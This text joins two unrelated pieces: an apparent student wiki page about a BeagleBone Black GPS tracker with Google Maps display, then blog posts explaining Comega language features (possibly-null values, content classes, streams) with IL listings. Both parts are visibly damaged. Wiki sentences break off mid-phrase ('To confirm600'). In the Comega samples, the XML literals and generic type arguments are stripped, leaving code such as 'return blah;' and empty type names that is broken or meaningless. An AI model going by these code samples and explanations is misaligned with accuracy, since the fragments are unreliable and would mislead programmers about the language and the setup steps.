00 Executive Summary - Out of date 00 Installation Instructions - Many important steps missing 00 User Instructions - Can't test 08 Highlights - Nice video, but a bit fuzzy. 10 Theory of Operation - Good 08 Work Breakdown - Not finished 09 Future Work - Good 10 Conclusions - Good 10 Demo - It works, but I can't reproduce it. 00 Late Comments: I'm looking forward to seeing this. Score: 55/100
Executive Summary
This project was done to interface the Adafruit Ultimate GPS to the Beaglebone Black in order to create a system that can track the whereabouts of the Beaglebone. There were two main goals for this project: to create a system that can track and store where the Beaglebone has been and to create an easy-to-use GUI that utilizes Google Maps to display this information on a map. We were ultimately successful in meeting these goals by creating an interface that can track the Bone's whereabouts in both real time and by passing it a time range to display.
Packaging
The GPS, battery, and wifi dongle are the only components needed outside of the beaglebone. We did not build a cape, but if we did,it would be a small cape for the GPS and a charging circuit for a lithium battery to power the system. The board and cape would go into a project box, with an antenna protruding for the GPS.
Installation Instructions
These instructions were testing against a fresh SD card installation of the 2013.09.05 image found here:
First, clone our github located here: Github Link If git says "HTTP request failed," create a file called .gitconfig in your home directory with these contents:
[http] sslCAinfo = /etc/ssl/certs/ca-certificates.crt
You may have to find where the ssl certificates are stored, and change the sslCAinfo line appropriately. This did work for the 2013.09.05 image.
GPS
The GPS we are using is MTK3339. Breakout board:
To load the device tree overlay on the beaglebone, cd to the ./bin directory and run:
root@beaglebone# ./load_uart_overlay.sh
Wire up the GPS's TX pin to the bone's P9_11 pin, the GPS's VCC to the bone's P9_3, and the GPS's GND to the bone's P9_1.
To confirm600
replacing ttyO4 with whatever device dmesg reported earlier.
You should see NMEA sentences that look similar to the ones in the links at the bottom of the page.
To disconnect from the screen session correctly, press <ctrl>+<a> then type ":quit" then press enter. (If you are running a screen to connect to the bone, read the man pages about passing the escape codes down)
Installing pyserial
First, install pip, python's package manager:
root@beaglebone# opkg install python-pip python_setuptools
Now install pyserial
root@beaglebone# pip install pyserial
pyserial should now be installed! Load it in python by doing:
import serial
Installing socketIO_client
First, for whatever reason, the 2013.09.05 python interpreter is missing netrc.py. We've included the file in the root of the repository, you should put it in python's lib folder (not site-packages). Typically it is in /usr/lib/python or /lib/python, but it varies. Google for more info.
After you have copied the netrc.py file over, you should be able to download socketIO_client:
root@beaglebone# pip install socketIO_client
installing dateutil
Our program uses dateutil for processing dates. To install it:
root@beaglebone# opkg install python-dateutil
Creating the Database
First, install sqlite3 on your beaglebone:
root@beaglebone# opkg install sqlite3
cd to the project's ./bin directory and run ./make_db. This creates a sqlite3 database in the project's ./var directory.
Starting the Tracker
To start up the tracker, first run ./webpage/MapServer.js, then run ./bin/gps_tracker.py. It should now be serving a webpage on port 8080!
Ad Hoc Networking
For this project, we felt that being able to connect to the Beaglebone directly to access the web interface would be beneficial. To do this, Robert:#! In our experience, it can take a while of pinging before we get a response back. We will have to look into what the cause of this is.
Automated Script
For our project, we compiled these changes into a easy to use script, called "ad-hoc_setup.sh". The script works as follows:
ad-hoc_setup.sh <interface> <IP_Address> <SSID>
This script must be run on both the Bone and the host that you want to add to the ad-hoc network. Keep in mind that the IP_Address must be different (but on the same subnet, /24) and the SSID must be the same.
User
Our project is able to track its position and recall the path later. Once the beaglebone is connected to a computer (wirelessly or by other means), it is able to serve up a webpage, where the user can either view the position with live updates or search for past locations the device was at.
Check out this video to see a quick demonstration of the GPS tracker in action. It is fairly raw and unedited, so we apologize for the lack of clarity..
Within the Python Backend, there are three processes, one handling the GPS serial connection, one listening for incoming messages from the server, and one handling search requests from the server. These threads share state through a SQL database and a semaphore controlling access to it.
Serial Thread
The serial thread reads data from the GPS, parses the important fields from it, and stores the results into a SQL database. It also checks if theh application is running in "live" mode, and if so, emits the latest info to the server.
Settings Handler
This thread manages updates to settings in the software. It sets up several callbacks, and waits for messages from the server. Currently, there are only two messages, "mode", which sets whether it is operating "live" or by "search", and "time_query", which stores in the SQL database that a time_query is pending along with its start and end times.
Search Handler
The search handler checks the SQL database for pending queries, executes them, and emits the results to the server.
JavaScript Server
As mentioned before, this acts as the middle-man between the backend and frontend. It uses SocketIO to listen for emissions from one side and then broadcasts the data to the other side.
Webpage Frontend
Javascript is used to create the majority of the webpage (Google Maps) and to listen for user input. Any user commands, such as a search request or a request to switch to live mode, are emitted to the JavaScript server. Further, the JS frontend is also listening for emissions from the server. These emissions are usually plot requests.
Work Breakdown
We first attempted to connect to the Beaglebone via the included FTDI cable. Here is a link to the FTDI cable's ref. sheet:. To connect the (Clean this up!)
Python Backend
Chris worked on the python side of the program. This included logging data, parsing messages from the GPS, and interfacing with Robert's server.
Javascript Server
Robert worked on creating the Javascript server. The code was mainly modeled after Dr. Yoder's Bonescript Server code. All of the extraneous features were stripped away, and all that was left was the code that created the server and interacted with the webpage. Code was then added to make the server act as a middle man between the Python backend and the webpage frontend.
Google Maps Webpage
We used Google Maps in Javascript to interface with the Beaglebone Black and display our GPS information.
Robert worked on the webpage,, we were able to create a button that would place a marker on coordinates specified by the user.
This was only a proof of concept. The ability to place arbitrary markers was not left in, but the code used to create these markers was incorporated into creating paths. To test this, we would feed live data from the GPS-tracker to the frontend webpage. We were able to see our position in real time. After this functionality was added, the ability for the user to interact with our system came next. A time-range functionality was added, which allowed the user to specify over what time period he or she would like to see the position of the Bone. Lastly, we added the ability for the user to choose whether they wanted to be in live mode or search mode with the use of radio buttons.
Incomplete Work
While working on this project, there were a few features that we ended up scrapping or didn't have the chance to get around to. Some of the features are suggested later in the Future Work section, others have not.
Though the Ad-Hoc wireless network works there are a few issues with it. It takes a long time for the computers to start communicating, it can be slow, and it will frequently disconnect, forcing you to wait for few seconds before the signal can be reestablished. One thing we wanted to do but weren't able to get around to was to create a keep-alive signal so that when a connection was established, it wouldn't become disconnected after a while of inactivity. The wireless network wasn't the focus of our project, however, so we never put a huge priority on this.
We planned on changing the line thickness of the paths on Google Maps based on velocity, but due to time constraints we were not able to implement this feature.
Future Work.
The UI has plenty of room for improvement as well. More search options could be added, such as by speed or proximity to a location. If the wifi dongle were replaced by a 3G modem, it could be set to send notifications to the operator when the tracker gets near certain locations, or if the tracker isn't near certain locations at schedule times (e.g., if your child isn't at school when they were supposed to).
Conclusions
Working with the Beaglebone to interface with a GPS tracker and then allow a user to view this information was a fun and interesting exercise. We had to work on a wide range of issues from working on the hardware to creating a usable user interface. Luckily the Beaglebone Black as a platform gave us many tools that made this possible and not ridiculously difficult. Through this project, we learned not only more about how the Beaglebone works, but about some non-Beaglebone related topics such as Javascript, HTML, and GPS Standards. Overall, working on this GPS Tracker for the Beaglebone was an interesting and enlightening project.
Useful Links
Server Side Events info:
GPS Ref. Sheet:
GPS NMEA Sentences:
Embedded Linux Class by Mark A. Yoder | http://elinux.org/index.php?title=ECE497_Project_GPS_Tracker&diff=prev&oldid=304130 | CC-MAIN-2017-13 | refinedweb | 1,832 | 62.27 |
Bart De Smet's on-line blog (0x2B | ~0x2B, that's the question)
After all the Comega stuff (which will be continued for a while I guess), let's post some funny things (allowing you to take a breath after all this nasty new syntax and geeky IL stuff).
You ever wondered about these funny codenames such as Everett, Whidbey, Longhorn, BlackComb, Yukon, Whitehorse? Well, you can find all these somewhere in North America using MapPoint :-). For example, the roadmap of development tools is going from Everett over Whidbey to Orcas. Everett is a town near Redmond and Seattle. By crossing some water ("Possession Sound") you end up on Whidbey island (likely they skipped Gedney, another island, as a codename). By going further in the northwestern direction, you'll end up on another island called Orcas. What will be next? San Juan, Saltspring, Lopez all sounds pretty good in my private opinion.
Other codenames have also funny stories associated with them such as Longhorn, BlackComb, Whistler (see). Yukon and Whitehorse can be found in Canada and Kodiak is in Alaska (other islands in that neighborhood such as Woody and Long were rejected for some reason, maybe you can think of some).
Feel free to complete this (rather useless) list :-)
Introduction
In the 4th episode of my "Adventures in Comega" series I'll be talking about a (smaller) language feature called "possibly-null values". As an example, consider a boolean value which has only two values (binary logic): true or false. However, what happens if you want to express that the logical value can be possibly unknown? As a bool is a value type and the domain is only {0,1} we can't possibly express this. Possibly-null values solve this problem by allowing you to assign null to the variable (or, that is the same as not assigning to it anything whatsoever) to indicate that the value is unknown, but only if the value is marked as being possibly-null.
Reference types and null
Today, you can use the "null" value for reference types. Basically, null indicates that the variable is not assigned to. As the matter in fact, behind the scenes that's the same as having a NULL pointer in the variable, because of the nature of reference types. The memory location of the reference type-variable contains just an address (that is, a pointer) to another place in memory where the real data is stored (which is called dynamically allocated memory, cf. malloc in C). In C# today the null keyword is used for this purpose: indicating whether an object has been assigned to or not. Quite often you'll see code like this:
if (null != someVar) //do thiselse //ow, there is some problem, handle it
C#-programming style tip: As a sideremark allow me to explain the programming style of putting a constant first in an equality comparison expression (null != somevar). The idea is that when you're comparing things in C#, you always need to type two characters: == for equality and != for non-equality. It's possible to forget one of these characters easily (not by lack of language knowlegde I hope, but because of a typo). When you do something like a == 5, there's no problem. But if you forget one of both equality symbols, you get a = 5, an assignment. Because assignments evaluate to a boolean value (true when the value is not 0, false if it is 0) this code will compile too (in C/C++ it does without warnings normally, C# will warn you about this risky construction). By reversing the constant and the variable like this 5 == a it's still possible to make the same mistake (5 = a) but now you'll get an error because a constant cannot be assigned to.
Another place where null values are used, is in database (you probably know the DbNull value). Today, in O/R mapping you can't directly express that a boolean or an integer or another basic typed field has as its value null, because null is not in the domain. Comega will help to solve this problem too.
NullReferenceException, casts and "as"
One of the others things that are related to the concept null is the NullReferenceException. Take a look at the following code:
SomeClass c = null;c.DoSomething();
Although this compiles, the CLR will throw a NullReferenceException at runtime because you can't perform an operation on a null-valued variable. Or, in C-terms, you can't dereference a nullpointer:
SomeClass *c = NULL; //or "SomeClass* c = NULL", anyway c is a pointer (indicated by the asterisk)(*c).DoSomething(); //the same as c->DoSomething(), but the *c syntax tells a little more in this demo for C-newbies :-)
The way to solve this problem is to put the whole thing in a try...catch block or by testing on the value of c. In the same way, the next piece of code with a property will fail:
SomeClass c = null;string s = c.SomeStringValuedProperty;
Yet another place where the null value is present is when you're using the keyword "as" in C# to perform a cast that can possibly fail:
//assume you got some variable o of type System.Object (e.g. through a method parameter)MyClass c = (MyClass) o; //will throw an exception if o is not a (subtype of) MyClass instanceMyClass cbis = o as MyClass; //won't throw an exception but will assign null to cbis if the type constraints are not fulfilled
Introducing possible-null values
In Comega, this problem is solved using possible-null values, as shown in the next example:
bool? b = null; //you can perform the test (null == b)
This piece of code declares a boolean variable that can be possibly null (indicated by the ?). So, you can assign null, true and false to it, and you can test it for a null value. In the case of a boolean value, this is kind of a ternary logic. Now, if you're using such a variable, you can even cast a null-valued variable without encountering an exception:
MyClass? c = null;MyClass d = (MyClass) c; //d is not possibly-null but as c is possibly null, this cast does not throw an exception
Notice that you can't do this casting with a value type such as a bool, if you write this:
bool? b = null;bool a = (bool) b; //will throw an exception, value types without a ? are never nullable
Transitivity of null values
One of the things Comega wants to solve by introducing the concept of possibly-null values is the (infamous?) NullReferenceException. The idea is to make null transitive, so that a property getter call on a null-valued variable can return null too:
MyClass? c = null;bool? b = c.SomeBooleanValuedProperty; //s will be null; no exception should be thrown
"Homework": what will be the result of the following code snippets?
MyClass? c = null;string s = c.SomeStringValuedProperty;
and of this:
MyClass? c = null;string? s = c.SomeStringValuedProperty;
and this:
MyClass? c = null;MyClass child = c.SomeChildMyClassValue;
And once again ... we'll dive into the IL stuff
Let's keep it as simple as possible this time :-). Consider this piece of code:
public static void Main(){ bool? b; Console.WriteLine(b); b = true; Console.WriteLine(b);}
In compiled format, the IL of Main is this:
.method public hidebysig static void Main() cil managed{ .entrypoint // Code size 32 (0x20) .maxstack 5 .locals init (valuetype StructuralTypes.'Boxed' V_0) IL_0000: ldloca.s V_0 IL_0002: call instance object StructuralTypes.'Boxed'::ToObject() IL_0007: call void [mscorlib]System.Console::WriteLine(object) IL_000c: ldc.i4.1 IL_000d: newobj instance void StructuralTypes.'Boxed'::.ctor(bool) IL_0012: stloc.0 IL_0013: ldloca.s V_0 IL_0015: call instance object StructuralTypes.'Boxed'::ToObject() IL_001a: call void [mscorlib]System.Console::WriteLine(object) IL_001f: ret} // end of method Test::Main
Clearly, the type of bool? is translated into a StructuralType called Boxed, with a generic approach indicating the type of the target variable (in this case System.Boolean). We already saw the Boxed type in the previous post (also when using ? but then to indicate the number of occurrences inside a content class' definition struct). Now, you can take a closer look at the Boxed type.
One of the first things you'll see is the IsNull method:
.method public hidebysig instance bool IsNull() cil managed{ // Code size 10 (0xa) .maxstack 8 IL_0000: ldarg.0 IL_0001: ldfld bool[] StructuralTypes.'Boxed'::'box' IL_0006: ldnull IL_0007: ceq IL_0009: ret} // end of method 'Boxed'::IsNull
This is the one being used to determine the "null-ness" of the variable. Furthermore, there is a getter (GetValue) and a setter (SetValue), which are both self-explanatory (the same statement holds for the constructor and the Equals method).
Also, you'll find a couple of static methods for the operator overloads for equality, inequality and casting (both explicit and implicit). These are pretty simple to understand too if you know the nature of the comparison overloads (one for == , one for ==
and one for
== thus in total 6 comparison operator static methods).
Notice you'll also find a class called BoxedEnumerator (generic - constructed with System.Boolean in our example - too) which was not used directly in our sample.
One of the targets of the Comega language is to build a bridge between semi-structured data (read: XML) and objects. In future posts I'll describe how Comega fills the gap between relational data (read: SQL) and objects. But in this post, let's concrate on the former case.
About DTD and XSD
By itself, XML is nothing more than a large text string or text file containing semi-structured data separated and ordered by means of a tagging mechanism. Although the different fields can be distinguished, there's a stringent need to give fields a meaning by using types. There's another need too: that of being capable to express certain constraints on the usage of fields (for example: has to occur, is optional, can occur one or more times, etc). That's where DTD/XSD comes into play, also known as XML schemas. Of course, the .NET Framework supports this kind of stuff by default (using the System.Xml namespace) but Cw want to integrate these things deeper in the language itself.
Content classes - a first view
Let's take a simple example of a book (library) collection. As you know, a book has a title, one or more authors, an ISBN code and optionally you can categorize it in one or more categories. In DTD, this looks as follows:
<!ELEMENT Book (Title, Authors, ISBN, Categories)>
<!ELEMENT Book (Title, Authors, ISBN, Categories)>
<!ELEMENT Title (#PCDATA)>
<!ELEMENT Authors (Author+)>
<!ELEMENT ISBN (#PCDATA)>
<!ELEMENT Categories (Category*)>
<!ELEMENT Author (#PCDATA)>
<!ELEMENT Category (#PCDATA)>
As you can see, the symbols + and * are used to indicate respectively "one or more" and "zero or more". There's also the symbol ? that can be used to indicate "zero or one" (= optional). What we don't have here is strong typing.
As an alternative we can use XSD to describe the same structure:
<element name="Book">
<complexType>
<sequence>
<element name="Title" type="string"/>
<element name="Authors">
<complexType>
<sequence minOccurs="1">
<element
name="Author" type="string"/>
</sequence>
</complexType>
</element>
<element name="ISBN" type="string"/>
<element name="Categories">
<complexType>
<sequence minOccurs="1">
<element
name="Category" type="string"/>
</sequence>
</complexType>
</element>
</sequence>
</complexType>
</element>
Instead of using *, +, ? XSD is using the minOccurs and maxOccurs attributes for the tags. Functionally, it's the same and here we have strong typing of the elements.
Both structures can be used to define a book like this:
<Book>
<Title>Title goes here</Title>
<Authors>
<Author>First Author</Author>
</Authors>
<ISBN>0123456789</ISBN>
<Categories>
<Category>One</Category>
<Category>Two</Category>
</Categories>
</Book>
However, it's far from cool to use this kind of data definitions inside code. Did you ever use XmlDocument (DOM) or other XML processing APIs like SAX? The construction of this kind of data objects is far from easy and looks rather clumpsy when viewed inside code. Luckily, there are a couple of ways to get around this, most notably the use of a strongly typed DataSet in the .NET Framework (created by using xsd.exe). But in the end, the internal representation of elements marked with ?, +, * is based on collection types and you get to see this directly, e.g. through the DataTable's Rows collection. Okay, you can iterate over it, but the translation battle going on to map both data representations is pretty visible.
So, how can Cw help us accomplishing a better model to cope with this semi-structured model in a more object-oriented fashion? The answer is content classes, which are based on the DTD syntax but have strongly typing aboard using the type model of the language and runtime (therefor every object can be used in the structure). Here's the book sample as a content class:
public class Book { struct { string Title; struct { string Author; }+ Authors; string ISBN; struct { string Category; }* Categories; }}
Optional fields can be declared in a similar fashion using the ? symbol. For example, a book can have an optional URL with additional information and/or errata:
public class Book { struct { string Title; struct { string Author; }+ Authors; string ISBN; struct { string Category; }* Categories; string? URL; }}
Nice, isn't it? Now, how to use this. The answer is again pretty simple and understandable: use XML inside the code, like this:
public Book GetSomeBook(){
return <Book>
<Title>Title goes
here</Title>
<Authors>
<Author>First Author</Author>
</Authors>
<ISBN>0123456789</ISBN>
<Categories>
<Category>One</Category>
<Category>Two</Category>
</Categories>
</Book>;
}
In an analogous fashion one can declare and assign a variable using XML syntax, like this (you don't need to mention the type):
b = <Book>
<Title>Title goes here</Title>
<Authors>
<Author>First Author</Author>
</Authors>
<ISBN>0123456789</ISBN>
<Categories>
<Category>One</Category>
<Category>Two</Category>
</Categories>
</Book>;
Okay, looks pretty static right now, isn't it? How can we make it somewhat more dynamically so that we can construct a book with a given title and ISBN for example:
public Book GetSomeSpecificBook(string
title, string ISBN)
{
return <Book>
<Title>{title}</Title>
<Authors>
<Author>First Author</Author>
</Authors>
<ISBN>{ISBN}</ISBN>
<Categories>
<Category>One</Category>
<Category>Two</Category>
</Categories>
</Book>;
}
This will construct a book using the given data. Notice that in between the curly braces one can specify a full expression too (e.g. to create a sum of certain values). Notice you can still use the default constructor approach too.
Now, assume you have a Book instance, how to grab the data from it in order to display it, transfer it, or something else? Look at the following example:
public ProcessBook(){ Book b = GetSomeBook();
foreach (it in b.Categories.Category) { Console.WriteLine(it); }}
Notice the usage of the it iterator variable again (which is assigned the right type automatically). As you can see the b.Categories.Category is in fact equivalent to the XPath expression /Categories/Category that you'd use in classic XML processing in order to obtain the values. Queries (which will be explained later in another post) can be applied as well, including transitive queries (get all values associated with a certain "label" in nested structures, using the ... notation) and the use of member selection to obtain a stream of values (see previous post for more information about streams) which can be combined with the filter [...] syntax. So, as you can see, this technology is very very broad already.
Extending the content class
As a content class is a class, it can also contain other members, such as methods. In fact, the defined struct defines the data structure that class is representing, in another way than using standard private attributes. Logically, these methods will have access to the data "attributes" of the class too in order to manipulate the data or to query the data. In order to do this, declare a method inside the class definition. Now, assume that categories have a structure like this "maincat-subcat-subcat" and you want to determine whether a book is in a certain main category. However, we have multiple categories associated with a book. So, one of the approaches would be to use the foreach(it in ...) syntax to iterate over all the categories associated with the book instance. As an alternative let's use a so-called transitive query. By using this...Category we'll obtain a stream of all the categories associated with the current book instance. Then, we can use the :: operator to refine our result by applying a filter that returns on its turn a filtered stream. Together, this looks like this:
this...Category::*[SomeFilter(it)]
So, inside the filter we're using a method that gets the current value of the iterator that is doing the filtering (called it, as explained earlier). Last but not least, you need to define the "SomeFilter" method. As we only want to use it locally in our "main category boolean method", we can use something called nested methods in Cw. The total implementation is this:
public virtual bool HasMainCategory(string category){ bool IsOfMainCategory(string category, string sel) { return category.StartsWith(sel + "-"); };
return this...Category::*[IsOfMainCategory(it, category)] != null;}
So, if we find a category in the list of categories with the given main category, we'll return true, otherwise false.
What's the IL :-)
Time for the nerdy stuff, what's a content class translated to upon compilation? Again, let's investigate this incrementally. We'll kick off with a very simple sample:
class Test{ struct { string val; }}
This is likely not that useful, but fairly interesting for sake of demonstration purposes. Compile and ildasm will give you this:
.field public valuetype StructuralTypes.Tuple_String_val sequence.custom instance void [System.Compiler.Runtime]System.Compiler.AnonymousAttribute::.ctor() = ( 01 00 00 00 )
So, the compiler defines a "structural type" called Tuple_String_val, also declared as a sequence. Further examination of that helper class results in this:
.class public auto ansi sealed Tuple_String_val extends [mscorlib]System.ValueType implements [System.Compiler.Runtime]StructuralTypes.ITupleType, System.Collections.Generic.'IEnumerable'{} // end of class Tuple_String_val
As you can see the class is derived from an ITupleType (an interface) and is a generic IEnumerable collection of strings too. Furthermore, there is a public field val (that we declared explicitly):
.field public string val
And the expected method GetEnumerator to get the enumerator:
.method public virtual instance class System.Collections.Generic.'IEnumerator' GetEnumerator() cil managed{ // Code size 12 (0xc) .maxstack 8 IL_0000: ldarg.0 IL_0001: ldobj StructuralTypes.Tuple_String_val IL_0006: newobj instance void System.Collections.Generic.EnumeratorTuple_String_val::.ctor(valuetype StructuralTypes.Tuple_String_val) IL_000b: ret} // end of method Tuple_String_val::GetEnumerator
This explains the possibility to use the foreach construct to iterate over the object.
Okay, time for something more. What about the ?, + and * symbols? Consider the following sample:
class Test{ struct { string* val1; string+ val2; string? val3; }}
This is far more heavy when you look at the IL. For the *, not that much changes. The basic difference in the StructuralType is the fact that you end up with a collection instead of a simple string as the attribute:
.field public class System.Collections.Generic.'IEnumerable' val1
For the +, the situation is far more complex. First of all, there should be a val2 field in the Tuple_IEnumerable that looks like this:
.field public valuetype StructuralTypes.'NonEmptyIEnumerable' val2
Again it's a generic type created using the System.String type, but this time it's of the type "NonEmptyIEnumerable". That is exactly what + is supposed to do ("one or more"). So inside the StructuralTypes section you'll find this type declared. Inside it, you'll find mainly enumerator logic and quite a bit conversion functions (implicit/explicit) to convert to various helper types. The helper types (also in StructuralTypes) include NonNull and Boxed, both with a generic nature (in our case, typed with the System.String type). I won't cover these in much more detail right now.
And finally we have the ? operator that leads by itself to a Boxed type:
.field public valuetype StructuralTypes.'Boxed' val3
This type again implements the generic IEnumerable for System.String.
Combined alltogether you'll see a fairly complicated set of helper types popping up after compilation. Our Books sample for instance results in 10 helper types to be created. The nesting of the structs in our content type can be examined in that case and has the following look:
.field public valuetype StructuralTypes.'NonEmptyIEnumerable' Authors.field public class System.Collections.Generic.'IEnumerable' Categories.field public string ISBN.field public string Title
So there are two other Tuple types for the nested structs. And on the class level the following declaration can be found:
.field public valuetype StructuralTypes.'Tuple_String_Title_NonEmptyIEnumerable_Authors_String_ISBN_IEnumerable_Categories' sequence
So, in the end two StructuralTypes are referred to in the declaration of the type: one for the authors and one for the categories.
Time to examine the constructor logic that is spit out by the compiler when it finds the XML declaration. In order to keep things (a bit) simple, let's use the following content class:
class Test{ struct { string* val; }
public Test GetTest() { return blah; }}
This is the result:
.method public hidebysig static class Test GetTest() cil managed{ // Code size 56 (0x38) .maxstack 5 .locals init (class Test V_0, string V_1, class System.Collections.Generic.'List' V_2, valuetype StructuralTypes.'Tuple_IEnumerable_val' V_3, class Test V_4, class Test V_5) IL_0000: newobj instance void Test::.ctor() IL_0005: stloc.0 IL_0006: ldstr "blah" IL_000b: stloc.1 IL_000c: newobj instance void System.Collections.Generic.'List'::.ctor() IL_0011: stloc.2 IL_0012: ldloc.2 IL_0013: ldloc.1 IL_0014: call instance int32 System.Collections.Generic.'List'::Add(string) IL_0019: pop IL_001a: ldloca.s V_3 IL_001c: ldloc.2 IL_001d: stfld class System.Collections.Generic.'IEnumerable' StructuralTypes.'Tuple_IEnumerable_val'::val IL_0022: ldloc.0 IL_0023: ldloc.3 IL_0024: stfld valuetype StructuralTypes.'Tuple_IEnumerable_val' Test::sequence IL_0029: ldloc.0 IL_002a: stloc.s V_4 IL_002c: br IL_0031 IL_0031: ldloc.s V_4 IL_0033: stloc.s V_5 IL_0035: ldloc.s V_4 IL_0037: ret} // end of method Test::GetTest
So, there's a call to add the "blah" string to the collection which is returned further on, after it has been wrapped into a Tuple_IEnumerable.
Question for you guys
There is some mistake in the previous sample. When you try to do this:
public static Test GetTest() { return blahbla; }
you'll end up with this error message from the compiler:
test.cw(12,34): error CS2518: Invalid content 'val' in element 'Test', the content for this element is already complete.
Make a fix to the code in order to get rid of this problem. Tip: it's just a one-character fix. In the end, I want to be able to write this:
public static void Main() { Test t = GetTest(); foreach(it in t.val) Console.WriteLine(it); }
which should print
blahbla
on the screen. Enjoy!
Streams in Cw are a way to create a kind of arrays (which consist of elements of a certain defined type) that are only created when these are needed (we call this lazy construction). As the matter in fact, streams are nothing more than autogenerated classes that are spit out by the compiler upon compilation. However, the concept op streams makes their usage completely transparent because of the automatic implementation of IEnumerable, which provides support for the "foreach iterator" usage, and - as explained further on - even more mechanisms to iterate over the elements.
Declaration
The first thing to do is to declare a stream in Cw. As I mentioned before, a stream is kind of an array with elements of a certain type. Therefore, we need to declare the type of course. To indicate you want to construct a stream, you're using the * operator. As an example, consider a stream of integers:
int* a;
C/C++ folks will recognize a pointer notation in this. It might help to think of this notation as one of the notations to declare an array in C/C++, and that idea makes sense pretty much as the concept of a stream is based on the concept of arrays.
Yield
Now it's time to populate the stream. As a stream is a "lazy built array", the system will build it dynamically by "yielding" the values in it. A simple approach looks like this:
int* GetStream(){ yield return 0;}
By calling the GetStream method, you'll end up with a stream that contains the value 0. Not that exciting, but enough to start explaining the concepts a little further. The usage of the stream looks now as follows:
void UseIt(){ int* a; a = GetStream(); foreach(int i in a) Console.WriteLine(i);}
By executing this code, you'll see ... 0 on the screen. Predictable I guess. Now the point is that the GetStream method could do more than just one yield too to build the stream. Even more, you can populate the stream based on decision logic, loops, and so on, like this:
int* GetStream(int s, int e){ while(s <= e) yield return s++;}
By calling GetStream(1,5), you'll get a stream that contains 1,2,3,4,5.
How does it work?
Okay, you've seen the basic principles of the stream and yield right now. Let's take a look at how this gets constructed internally. Because Cw runs on the .NET Framework v1.1, it's just generating (that is, the cwc.exe compiler) MSIL code. When you inspect the generated assembly through ildasm, you'll see your method GetStream in the IL-code looking like this:
.method private hidebysig static class System.Collections.Generic.'IEnumerable' GetStream(int32 s, int32 e) cil managed{ // Code size 31 (0x1f) .maxstack 2 .locals init (class Streams/'closure:765' V_0, class System.Collections.Generic.'IEnumerable' V_1, class System.Collections.Generic.'IEnumerable' V_2) IL_0000: newobj instance void Streams/'closure:765'::'.ctor$PST06000007'() IL_0005: stloc.0 IL_0006: ldloc.0 IL_0007: ldarg.0 IL_0008: stfld int32 Streams/'closure:765'::s$PST04000001 IL_000d: ldloc.0 IL_000e: ldarg.1 IL_000f: stfld int32 Streams/'closure:765'::e$PST04000002 IL_0014: ldloc.0 IL_0015: stloc.1 IL_0016: br IL_001b IL_001b: ldloc.1 IL_001c: stloc.2 IL_001d: ldloc.1 IL_001e: ret} // end of method Streams::GetStream
What's going on here? Quite a lot, but the most interesting part is actually the fact that the GetStream method is creating an instance of some "closure:765" class, which was generated during the compilation and has the following signature:
.class auto ansi sealed nested private specialname 'closure:765' extends [mscorlib]System.Object implements [mscorlib]System.Collections.IEnumerable, System.Collections.Generic.'IEnumerator', [mscorlib]System.Collections.IEnumerator, [mscorlib]System.IDisposable, System.Collections.Generic.'IEnumerable'{} // end of class 'closure:765'
As you can see, the class is nested and is implementing a bunch of IEnumera* interfaces, both generic ad "classic" (notice that the System.Collections.Generic namespace is present in Cw on .NET v1.1 too, whileas this is one of the big features in C# 2.0 today).
Secondly, this class has two privatescope-d variables s and e that are used by the GetStream method to pass through the parameters to the nested class:
.field privatescope int32 s$PST04000001.field privatescope int32 e$PST04000002
Beside of this, there's also the field "currentValue" that's being used to report the current value of the stream to the caller (via the enumerator):
.field private int32 'current Value'
The real "magic" is going on in the MoveNext method that is called every time the next element has to be retrieved. The contents of this method is quite predictable and will make decisions based on the current value together with s and e to return the desired value in the stream:
.method public virtual instance bool MoveNext() cil managed{ // Code size 74 (0x4a) .maxstack 5 .locals init (class Streams/'closure:765' V_0, int32 V_1) IL_0000: ldarg.0 IL_0001: stloc.0 IL_0002: ldarg.0 IL_0003: ldfld int32 Streams/'closure:765'::'current Entry Point: ' IL_0008: switch ( IL_0015, IL_0046) IL_0015: ldloc.0 IL_0016: ldfld int32 Streams/'closure:765'::s$PST04000001 IL_001b: ldloc.0 IL_001c: ldfld int32 Streams/'closure:765'::e$PST04000002 IL_0021: bgt IL_0048 IL_0026: ldarg.0 IL_0027: ldloc.0 IL_0028: ldfld int32 Streams/'closure:765'::s$PST04000001 IL_002d: stloc.1 IL_002e: ldloc.0 IL_002f: ldloc.1 IL_0030: ldc.i4.1 IL_0031: add IL_0032: stfld int32 Streams/'closure:765'::s$PST04000001 IL_0037: ldloc.1 IL_0038: stfld int32 Streams/'closure:765'::'current Value' IL_003d: ldarg.0 IL_003e: ldc.i4.1 IL_003f: stfld int32 Streams/'closure:765'::'current Entry Point: ' IL_0044: ldc.i4.1 IL_0045: ret IL_0046: br.s IL_0015 IL_0048: ldc.i4.0 IL_0049: ret} // end of method 'closure:765'::MoveNext
First, there is some branching going on based on the current value of s and e, and if still in the scope, s is incremented (add) and set to the current value and the method returns.
Finally, main calls the GetStream method and calls the enumerator to iterate over the collection in order to Console.WriteLine the values to the screen:
.method public hidebysig static void Main() cil managed{ .entrypoint // Code size 66 (0x42) .maxstack 7 .locals init (class System.Collections.Generic.'IEnumerable' V_0, class System.Collections.Generic.'IEnumerable' V_1, class System.Collections.Generic.'IEnumerator' V_2, int32 V_3, int32 V_4) IL_0000: ldc.i4.1 IL_0001: ldc.i4.5 IL_0002: call class System.Collections.Generic.'IEnumerable' Streams::GetStream(int32, int32) IL_0007: stloc.0 IL_0008: ldloc.0 IL_0009: stloc.1 IL_000a: ldloc.1 IL_000b: brfalse IL_003b IL_0010: ldloc.1 IL_0011: callvirt instance class System.Collections.Generic.'IEnumerator' System.Collections.Generic.'IEnumerable'::GetEnumerator() IL_0016: stloc.2 IL_0017: ldloc.2 IL_0018: brfalse IL_003b IL_001d: ldloc.2 IL_001e: callvirt instance bool System.Collections.Generic.'IEnumerator'::MoveNext() IL_0023: brfalse IL_003b IL_0028: ldloc.2 IL_0029: callvirt instance int32 System.Collections.Generic.'IEnumerator'::get_Current() IL_002e: stloc.3 IL_002f: ldloc.3 IL_0030: stloc.s V_4 IL_0032: ldloc.s V_4 IL_0034: call void [mscorlib]System.Console::WriteLine(int32) IL_0039: br.s IL_001d IL_003b: call string [mscorlib]System.Console::ReadLine() IL_0040: pop IL_0041: ret} // end of method Streams::Main
Notice the return type for the int*; it's just a generic enumerable of Int32 values. For the geeks, take a look at the closure:765 nested class's get_Current method. You'll remark that it's using boxing, something that has to do with the usage of a non-generic class (boxing/unboxing). For more information about these issues and the evolution in .NET v2.0, consult documentation about generics in C# v2.0 and so on.
Intermediate wrap-up
